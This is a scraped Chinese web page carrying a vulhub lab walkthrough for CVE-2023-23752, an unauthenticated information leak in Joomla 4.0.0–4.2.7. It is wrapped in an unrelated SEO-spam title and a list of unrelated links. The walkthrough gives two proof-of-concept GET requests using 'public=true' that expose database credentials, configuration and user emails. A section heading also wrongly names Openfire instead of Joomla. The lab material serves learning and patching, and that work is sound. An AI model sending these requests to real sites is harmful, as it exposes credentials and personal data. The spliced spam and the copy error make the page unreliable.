当前位置: 首页 > news >正文

网站建设与管理专业学什么装修网站设计案例

网站建设与管理专业学什么,装修网站设计案例,网站建设要代码有什么好处,宁波seo在线优化方案公司CVE-2023-23752#xff1a;Joomla未授权访问漏洞复现 前言 本次测试仅供学习使用#xff0c;如若非法他用#xff0c;与本文作者无关#xff0c;需自行负责#xff01;#xff01;#xff01; 一.Openfire简介 Joomla是一个免费的开源内容管理系统#xff08;CMSJoomla未授权访问漏洞复现 前言 本次测试仅供学习使用如若非法他用与本文作者无关需自行负责 一.Openfire简介 Joomla是一个免费的开源内容管理系统CMS允许用户构建网站和在线应用程序。它于 2005 年首次发布此后成为最受欢迎的 CMS 平台之一为全球数百万个网站提供支持。 二.漏洞简述 在 Joomla 4.0.0 到 4.2.7 中发现了一个问题。不正确地访问检查允许对 Web 服务终结点进行未经授权的访问。 三.漏洞原理 CVE-2023-23752 是身份验证绕过导致 Joomla 信息泄露。 四.影响版本 4.0.0 Joomla 4.2.7五.环境搭建 在kali的docker中搭建vulhub进行漏洞复现 clone项目 sudo git clone https://github.com/vulhub/vulhub.git在/joomla/CVE-2023-23752/目录用下面的命令下载并启动: sudo docker-compose up -d搞定查看环境 sudo docker-compose ps看到端口这里是8080。 在浏览器上访问http://your-ip:8080 进入环境说明配置成功了接下来就可以开始愉快的漏洞复现了 六.漏洞复现 Joomla 大致有三个路由入口分别是 根目录的index.php(用户访问文章) 根目录的administrator/index.php(管理员管理) 根目录的api/index.php(开发者爱好的Rest API)未授权的接口正是第三个入口因此受影响范围为 Joomla4.0.0——Joomla4.2.7Rest API 4.x正式开发 1.漏洞利用 此问题是由属性覆盖问题引起的攻击者可以使用 publictrue 以绕过授权检查。 例如通过以下POC1公开所有配置包括MySQL用户名和密码 POC1GET http://your-ip:8080/api/index.php/v1/config/application?publictruePOC2GET http://your-ip:8080/api/index.php/v1/users?publictrue通过以以上POC公开所有用户信息包括电子邮件 我们发现了用户信息以及用户电子邮件。 七.修复建议 目前官方已发布安全版本修复此漏洞建议存在风险的用户及时升级到安全版本。 安全版本Joomla 4.2.8 下载链接 https://downloads.joomla.org/
http://www.hkea.cn/news/14444556/

相关文章:

  • 免费网站制作多少钱郑州网站建
  • 厦门营销型网站建设公司广东网络公司网站
  • 陕西建设厅执业资格注册中心网站怎样做艾条艾柱网站
  • 城固网站建设wordpress 博客主机
  • 温州网站关键词推广最佳的资源磁力搜索引擎
  • 网站建设在哪里进行企业组网方案
  • 网站建设外包还是自建物联网工程是干什么的
  • 百度站长平台诊断上海seo方案
  • 南昌做兼职的网站设计网站开发设置网页端口
  • 周大福网站设计特点个人网站备案信息填写
  • 怎么区分营销型和展示型的网站东莞关键词排名推广
  • 网站开发设计书籍wordpress产品参数多图
  • 赣州网站建设好么深圳营销网站建设服务
  • 建设一个地方门户网站福建省住房城乡建设厅网站
  • 手套网站模板建设响应式网站有哪些好处
  • 如何提高网站的点击量自己怎么做网站游戏
  • 免费个人自助建站网站 备案 中国 名字吗
  • 申请个人网站做seo必须有自己网站吗
  • 杭州营销网站建设平台视频网站建设工具
  • iis 网站属性北京亦庄做网站公司
  • 哪些网站做科技专题app开发公司有什么部门
  • 燕赵邯郸网站建设个人网站推广方法
  • 找生产厂家的网站农庄网站
  • 外链是不是把自己的网站信息发布到别人的网站上?wordpress文章引用格式
  • 河南省工程项目信息公示栏电商seo是什么意思啊
  • 阿坝网站设计三亚最新发布
  • 无忧网站建设服务宁波自适应网站建设
  • 如何在阿里巴巴建设网站网站安全认证去哪做
  • 网站设计师的岗位职责外贸公司应该怎样做外贸网站
  • 又一个wordpress网站科研实验室网站建设